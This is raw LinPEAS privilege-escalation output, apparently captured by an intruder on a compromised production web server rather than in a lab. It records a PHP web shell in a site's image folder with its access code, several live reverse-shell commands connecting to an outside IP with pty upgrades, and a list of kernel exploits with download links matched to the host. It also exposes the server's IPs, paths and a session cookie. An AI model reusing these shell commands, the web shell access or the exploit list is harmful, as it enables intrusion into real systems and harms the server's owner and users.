β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„             β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„ β–„β–„β–„β–„     β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„ β–„    β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„       β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„          β–„β–„β–„β–„β–„β–„               β–„β–„β–„β–„β–„β–„ β–„ β–„β–„β–„β–„β–„β–„              β–„β–„β–„β–„β–„β–„β–„β–„                 β–„β–„β–„β–„  β–„β–„                  β–„β–„β–„ β–„β–„β–„β–„β–„                  β–„β–„β–„ β–„β–„                β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                  β–„β–„ β–„            β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„   β–„β–„ β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                β–„β–„β–„β–„ β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„β–„     β–„β–„β–„β–„ β–„β–„β–„β–„   β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„      β–„ β–„β–„ β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„        β–„β–„β–„β–„β–„β–„β–„        β–„β–„β–„β–„β–„     β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„   β–„β–„β–„β–„β–„   β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„        β–„          β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„            β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–€β–€β–„β–„β–„   β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–€β–€β–€β–€β–€β–€ β–€β–€β–€β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„β–„β–€β–€ β–€β–€β–€β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–€β–€β–€ /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Learn Cloud Hacking : https://training.hacktricks.xyz  | | Follow on Twitter : @hacktricks_live | | Respect on HTB : SirBroccoli  | |---------------------------------------------------------------------------------| | Thank you!  | \---------------------------------------------------------------------------------/  LinPEAS-ng by carlospolop  ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.  Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html  LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting LinPEAS. Caching Writable Folders...  ╔═══════════════════╗ ═══════════════════════════════╣ Basic information ╠═══════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• OS: Linux version 3.10.0-957.27.2.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Mon Jul 29 17:46:05 UTC 2019 User & Groups: uid=99(nobody) gid=99(nobody) groups=99(nobody) Hostname: ns1.miisky.com [+] /bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h) [+] /bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)  Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE   ╔════════════════════╗ ══════════════════════════════╣ System Information ╠══════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ Operative system β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits Linux version 3.10.0-957.27.2.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Mon Jul 29 17:46:05 UTC 2019 lsb_release Not Found  ╔══════════╣ Sudo version β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version Sudo version 1.8.23 ╔══════════╣ PATH β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses /usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin ╔══════════╣ Date & uptime Fri May 23 17:17:39 IST 2025 17:17:39 up 14:16, 0 users, load average: 6.56, 4.77, 2.62 ╔══════════╣ Unmounted file-system? β•š Check if you can mount umounted devices  /dev/mapper/centos-root / xfs defaults,uquota 0 0 UUID=ae129d83-91e0-47f1-a057-ca7bfb81709a /boot xfs defaults 0 0 /dev/mapper/centos-swap swap swap defaults 0 0 /usr/tmpDSK /tmp ext3 defaults,noauto 0 0 /tmp /var/tmp ext3 defaults,bind,noauto 0 0 ╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) disk ╔══════════╣ Environment β•š Any private information inside environment variables? SERVER_SIGNATURE= HTTP_X_HTTPS=1 ORIG_PATH_TRANSLATED=/home/miisky/public_html/food_order_admin/img/406.php SSL_TLS_SNI=www.miisky.com HTTP_SEC_FETCH_DEST=empty UNIQUE_ID=aDBgGVaL-pmdRelAZNNXdwAAAAw REDIRECT_SCRIPT_URL=/food_order_admin/img/406.php HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 REDIRECT_SCRIPT_URI=https://www.miisky.com/food_order_admin/img/406.php HTTP_HOST=www.miisky.com HTTP_ORIGIN=https://www.miisky.com SERVER_PORT=443 REDIRECT_HANDLER=application/x-httpd-ea-php56 DOCUMENT_ROOT=/home/miisky/public_html HTTPS=on SCRIPT_FILENAME=/home/miisky/public_html/food_order_admin/img/406.php REQUEST_URI=/food_order_admin/img/406.php?feature=shell&code=india1947 SCRIPT_NAME=/food_order_admin/img/406.php SCRIPT_URI=https://www.miisky.com/food_order_admin/img/406.php HTTP_CONNECTION=keep-alive REMOTE_PORT=56684 PATH=/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin ORIG_SCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/ea-php56 SCRIPT_URL=/food_order_admin/img/406.php CONTEXT_PREFIX=/cgi-sys SERVER_ADMIN=webmaster@miisky.com PWD=/home/miisky/public_html/food_order_admin/img/new REDIRECT_UNIQUE_ID=aDBgGVaL-pmdRelAZNNXdwAAAAw REQUEST_SCHEME=https REDIRECT_SSL_TLS_SNI=www.miisky.com REDIRECT_STATUS=200 TZ=Asia/Kolkata REDIRECT_HTTPS=on REDIRECT_QUERY_STRING=feature=shell&code=india1947 HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5 HTTP_REFERER=https://www.miisky.com/food_order_admin/img/406.php?code=india1947 HTTP_ACCEPT=*/* HTTP_DNT=1 HTTP_PRIORITY=u=0 ORIG_SCRIPT_NAME=/cgi-sys/ea-php56 REMOTE_ADDR=103.108.174.25 SERVER_NAME=www.miisky.com SHLVL=2 CONTENT_LENGTH=100 HTTP_SEC_FETCH_MODE=cors SERVER_SOFTWARE=Apache QUERY_STRING=feature=shell&code=india1947 SERVER_ADDR=45.127.102.254 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 HTTP_ACCEPT_ENCODING=gzip, deflate, br, zstd CONTENT_TYPE=application/x-www-form-urlencoded REDIRECT_URL=/food_order_admin/img/406.php HTTP_SEC_GPC=1 HTTP_SEC_FETCH_SITE=same-origin HTTP_COOKIE=PHPSESSID=f1fru1miu2ljoi9vrgqeli7ci2 REQUEST_METHOD=POST CONTEXT_DOCUMENT_ROOT=/usr/local/cpanel/cgi-sys/ ORIG_PATH_INFO=/food_order_admin/img/406.php _=/bin/env ╔══════════╣ Searching Signature verification failed in dmesg β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed dmesg Not Found  ╔══════════╣ Executing Linux Exploit Suggester β•š https://github.com/mzet-/linux-exploit-suggester cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe [+] [CVE-2016-5195] dirtycow Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04 Download URL: https://www.exploit-db.com/download/40611 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,[ RHEL=5|6|7 ],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 ext-url: https://www.exploit-db.com/download/40847 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2017-1000253] PIE_stack_corruption Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt Exposure: probable Tags: RHEL=6,[ RHEL=7 ]{kernel:3.10.0-514.21.2|3.10.0-514.26.1} Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c [+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET) Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/ https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Exposure: less probable Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2021-4034] PwnKit Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: less probable Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main [+] [CVE-2021-3156] sudo Baron Samedit Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: less probable Tags: mint=19,ubuntu=18|20, debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-3156] sudo Baron Samedit 2 Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: less probable Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main [+] [CVE-2021-22555] Netfilter heap out-of-bounds write Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: less probable Tags: ubuntu=20.04{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded [+] [CVE-2019-18634] sudo pwfeedback Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/ Exposure: less probable Tags: mint=19 Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c Comments: sudo configuration requires pwfeedback to be enabled. [+] [CVE-2019-15666] XFRM_UAF Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc Exposure: less probable Download URL: Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled [+] [CVE-2018-1000001] RationalLove Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ Exposure: less probable Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9} Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c Comments: kernel.unprivileged_userns_clone=1 required [+] [CVE-2017-7308] af_packet Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html Exposure: less probable Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels [+] [CVE-2017-6074] dccp Details: http://www.openwall.com/lists/oss-security/2017/02/22/3 Exposure: less probable Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} Download URL: https://www.exploit-db.com/download/41458 Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass [+] [CVE-2017-5618] setuid screen v4.5.0 LPE Details: https://seclists.org/oss-sec/2017/q1/184 Exposure: less probable Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154 [+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64 Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt Exposure: less probable Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611 Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c Comments: Uses "Stack Clash" technique, works against most SUID-root binaries [+] [CVE-2016-2384] usb-midi Details: https://xairy.github.io/blog/2016/cve-2016-2384 Exposure: less probable Tags: ubuntu=14.04,fedora=22 Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user [+] [CVE-2015-9322] BadIRET Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/ Exposure: less probable Tags: RHEL<=7,fedora=20 Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz [+] [CVE-2015-8660] overlayfs (ovl_setattr) Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ Exposure: less probable Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic} Download URL: https://www.exploit-db.com/download/39166 [+] [CVE-2015-8660] overlayfs (ovl_setattr) Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ Exposure: less probable Download URL: https://www.exploit-db.com/download/39230 [+] [CVE-2015-3246] userhelper Details: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt Exposure: less probable Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22 Download URL: https://www.exploit-db.com/download/37706 Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c [+] [CVE-2014-5207] fuse_suid Details: https://www.exploit-db.com/exploits/34923/ Exposure: less probable Download URL: https://www.exploit-db.com/download/34923 [+] [CVE-2014-4014] inode_capable Details: http://www.openwall.com/lists/oss-security/2014/06/10/4 Exposure: less probable Tags: ubuntu=12.04 Download URL: https://www.exploit-db.com/download/33824 [+] [CVE-2014-0196] rawmodePTY Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html Exposure: less probable Download URL: https://www.exploit-db.com/download/33516 [+] [CVE-2016-0728] keyring Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ Exposure: less probable Download URL: https://www.exploit-db.com/download/40003 Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working ╔══════════╣ Protections ═╣ AppArmor enabled? .............. AppArmor Not Found ═╣ AppArmor profile? .............. unconfined ═╣ is linuxONE? ................... s390x Not Found ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ # Set kernel.exec-shield to 1 per security requirements kernel.exec-shield = 1 ═╣ SELinux enabled? ............... SELinux status: disabled ═╣ Seccomp enabled? ............... disabled ═╣ User namespace? ................ enabled ═╣ Cgroup2 enabled? ............... disabled ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes (xen)  ╔═══════════╗ ═══════════════════════════════════╣ Container ╠═══════════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ Container related tools present (if any): ╔══════════╣ Container details ═╣ Is this a container? ........... No ═╣ Any running containers? ........ No   ╔═══════╗ ═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════  β•šβ•β•β•β•β•β•β•β• Learn and practice cloud hacking techniques in training.hacktricks.xyz  ═╣ GCP Virtual Machine? ................. No ═╣ GCP Cloud Funtion? ................... No ═╣ AWS ECS? ............................. No ═╣ AWS EC2? ............................. No ═╣ AWS EC2 Beanstalk? ................... No ═╣ AWS Lambda? .......................... No ═╣ AWS Codebuild? ....................... No ═╣ DO Droplet? .......................... No ═╣ IBM Cloud VM? ........................ No ═╣ Azure VM or Az metadata? ............. No ═╣ Azure APP or IDENTITY_ENDPOINT? ...... No ═╣ Azure Automation Account? ............ No ═╣ Aliyun ECS? .......................... No ═╣ Tencent CVM? ......................... No   ╔════════════════════════════════════════════════╗ ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ Running processes (cleaned) β•š Check weird & unexpected proceses run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes root 1 0.0 0.0 52028 3600 ? Ss 03:01 0:45 /usr/lib/systemd/systemd --switched-root --system --deserialize 22 root 574 0.0 0.1 39252 7272 ? Ss 03:01 0:03 /usr/lib/systemd/systemd-journald root 595 0.0 0.0 272288 1228 ? Ss 03:01 0:02 /usr/sbin/lvmetad -f root 601 0.0 0.0 44620 1308 ? Ss 03:01 0:00 /usr/lib/systemd/systemd-udevd root 846 0.0 0.0 55520 536 ? S pea.txt 2>&1 nobody 64135 0.2 0.0 14628 4544 ? S 17:14 0:00 | _ /bin/sh ./linpeas.sh nobody 13640 1.5 0.0 14628 3728 ? S 17:18 0:00 | _ /bin/sh ./linpeas.sh nobody 49485 0.0 0.1 204716 7484 ? S 16:29 0:02 _ /usr/sbin/httpd -k start nobody 32278 0.0 0.1 204712 7388 ? S 16:49 0:00 _ /usr/sbin/httpd -k start nobody 6739 0.0 0.2 213932 14016 ? S 17:16 0:00 | _ /opt/cpanel/ea-php56/root/usr/bin/php-cgi nobody 6745 0.0 0.0 11680 1396 ? S 17:16 0:00 | _ sh -c ./linpeas.sh > pea.txt 2>&1 nobody 6748 0.2 0.0 13592 3456 ? S 17:16 0:00 | _ /bin/sh ./linpeas.sh nobody 18393 0.0 0.0 13592 2448 ? S 17:18 0:00 | _ /bin/sh ./linpeas.sh nobody 18399 0.0 0.0 51864 1872 ? R 17:18 0:00 | | _ ps fauxwww nobody 18396 0.0 0.0 13592 2240 ? S 17:18 0:00 | _ /bin/sh ./linpeas.sh nobody 62631 0.0 0.1 204736 7372 ? S 17:03 0:00 _ /usr/sbin/httpd -k start nobody 63024 0.0 0.1 204840 7424 ? S 17:05 0:00 _ /usr/sbin/httpd -k start nobody 63228 0.0 0.1 204712 6832 ? S 17:06 0:00 _ /usr/sbin/httpd -k start nobody 63727 0.0 0.1 204576 7004 ? S 17:10 0:00 _ /usr/sbin/httpd -k start nobody 63797 0.0 0.2 213932 14052 ? S 17:11 0:00 | _ /opt/cpanel/ea-php56/root/usr/bin/php-cgi nobody 63798 0.0 0.0 11680 1392 ? S 17:11 0:00 | _ sh -c sh -i 5<> /dev/tcp/51.79.165.150/8449 0<&5 1>&5 2>&5 nobody 63799 0.0 0.0 11816 1716 ? S 17:11 0:00 | _ sh -i nobody 63815 0.0 0.0 26056 4804 ? S 17:11 0:00 | _ python -c import pty;pty.spawn("/bin/bash") nobody 63816 0.0 0.0 11816 1712 pts/1 Ss+ 17:11 0:00 | _ /bin/bash nobody 64022 0.0 0.1 204576 7204 ? S 17:13 0:00 _ /usr/sbin/httpd -k start nobody 64023 0.0 0.1 204712 7304 ? S 17:13 0:00 _ /usr/sbin/httpd -k start nobody 64129 0.0 0.1 204712 6748 ? S 17:14 0:00 _ /usr/sbin/httpd -k start nobody 64131 0.0 0.1 204720 7272 ? S 17:14 0:00 _ /usr/sbin/httpd -k start nobody 64132 0.0 0.1 204712 7552 ? R 17:14 0:00 _ /usr/sbin/httpd -k start nobody 18148 1.6 0.2 213672 13432 ? S 17:18 0:00 | _ /opt/cpanel/ea-php56/root/usr/bin/php-cgi nobody 5261 0.0 0.1 204576 6476 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 5838 0.0 0.1 204576 7104 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 5887 0.0 0.1 204576 7168 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 5979 0.0 0.0 204444 5808 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 5980 0.0 0.1 204576 7088 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 6652 0.0 0.1 206748 7384 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 11911 0.0 0.1 204576 6596 ? S 17:17 0:00 _ /usr/sbin/httpd -k start root 2134 0.0 0.0 53004 2448 ? Ss 03:01 0:01 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf dovenull 2138 0.0 0.0 46876 3956 ? S 03:01 0:00 _ dovecot/pop3-login dovenull 2139 0.0 0.0 46888 4476 ? S 03:01 0:00 _ dovecot/imap-login dovecot 2140 0.0 0.0 10316 1328 ? S 03:01 0:00 _ dovecot/anvil root 2141 0.0 0.0 10448 1512 ? S 03:01 0:00 _ dovecot/log dovenull 2142 0.0 0.0 46876 3952 ? S 03:01 0:00 _ dovecot/pop3-login dovenull 2143 0.0 0.0 46888 4480 ? S 03:01 0:00 _ dovecot/imap-login root 2144 0.0 0.0 17820 3540 ? S 03:01 0:00 _ dovecot/config dovecot 2145 0.0 0.0 13564 1524 ? S 03:01 0:00 _ dovecot/stats dovecot 63960 0.0 0.0 41068 3032 ? S 17:12 0:00 _ dovecot/auth root 13342 0.0 0.0 41068 2852 ? S 17:18 0:00 _ dovecot/auth -w rpc 5339 0.0 0.0 69264 1536 ? Ss 04:04 0:00 /sbin/rpcbind -w nobody 62353 0.0 0.0 11680 1392 ? S 17:01 0:00 sh -c sh -i 5<> /dev/tcp/51.79.165.150/8449 0<&5 1>&5 2>&5 nobody 62354 0.0 0.0 11816 1716 ? S 17:01 0:00 _ sh -i nobody 62634 0.0 0.0 26056 4804 ? S 17:03 0:00 _ python -c import pty;pty.spawn("/bin/bash") nobody 62635 0.0 0.0 11820 1752 pts/0 Ss 17:03 0:00 _ /bin/bash nobody 63720 167 0.0 10612 396 pts/0 Sl+ 17:10 14:24 _ ./d new.txt test root 13531 0.0 0.1 350396 6728 ? Sl 17:18 0:00 /usr/sbin/abrt-dbus -t133 root 15634 0.0 0.0 151292 3628 ? Ssl 17:18 0:00 /usr/libexec/fprintd ╔══════════╣ Processes with credentials in memory (root req) β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 process found (dump creds from memory as root) sshd Not Found  ╔══════════╣ Processes whose PPID belongs to a different user (not root) β•š You will know if a user can somehow spawn processes as a different user  ╔══════════╣ Files opened by processes belonging to other users β•š This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Systemd PATH β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin ╔══════════╣ Cron jobs β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs /usr/local/bin/crontab incrontab Not Found -rw-------  1 root root    8 Mar 14 11:28 /etc/cron.allow -rw-------. 1 root root  232 Feb  6  2017 /etc/cron.deny -rw-r--r--  1 root root  451 Jun 10  2014 /etc/crontab  /etc/cron.d: total 48 drwxr-xr-x.   2 root root  4096 Apr 22 21:04 . drwxr-xr-x. 121 root root 12288 May 23 17:10 .. -rw-r--r--    1 root root   128 Nov 20  2018 0hourly -rw-r-----    1 root root   269 Jul 15  2019 cpanel-dovecot-solr -rw-------    1 root root    58 Dec 20  2017 cpanel_autossl -rw-r--r--    1 root root  2257 Aug 24  2024 mailman -rw-r--r--    1 root root   108 Oct 30  2018 raid-check -rw-------    1 root root   235 Jul 29  2019 sysstat -rw-r--r--    1 root root   881 May 18 02:47 wp-toolkit-update  /etc/cron.daily: total 40 drwxr-xr-x.   2 root root   107 Aug  6  2019 . drwxr-xr-x. 121 root root 12288 May 23 17:10 .. -rwxr-xr-x    1 root root   332 Nov  5  2018 0yum-daily.cron -rwxr-xr-x.   1 root root  2239 Jun 10  2014 certwatch -rwx------    1 root root   258 Aug 14  2017 logrotate -rwxr-xr-x    1 root root   618 Oct 30  2018 man-db.cron -rwx------    1 root root   208 Apr 11  2018 mlocate -rwxr-xr-x    1 root root    60 Feb  3  2017 tmpwatch  /etc/cron.hourly: total 28 drwxr-xr-x.   2 root root    55 Aug  6  2019 . drwxr-xr-x. 121 root root 12288 May 23 17:10 .. -rwxr-xr-x    1 root root   392 Nov 20  2018 0anacron -rwxr-xr-x    1 root root   362 Nov  5  2018 0yum-hourly.cron -rwxr-xr-x    1 root root   149 Feb 27  2017 iops  /etc/cron.monthly: total 16 drwxr-xr-x.   2 root root     6 Jun 10  2014 . drwxr-xr-x. 121 root root 12288 May 23 17:10 ..  /etc/cron.weekly: total 16 drwxr-xr-x.   2 root root     6 Jun 10  2014 . drwxr-xr-x. 121 root root 12288 May 23 17:10 ..  /var/spool/anacron: total 16 drwxr-xr-x.  2 root root   60 Nov 20  2018 . drwxr-xr-x. 14 root root 4096 Aug 14  2017 .. -rw-------.  1 root root    9 May 23 04:16 cron.daily -rw-------.  1 root root    9 May 10 05:30 cron.monthly -rw-------.  1 root root    9 May 19 04:51 cron.weekly SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root bin daemon adm lp sync shutdown halt mail operator games ftp nobody avahi-autoipd dbus abrt apache polkitd libstoragemgmt tss postfix sshd 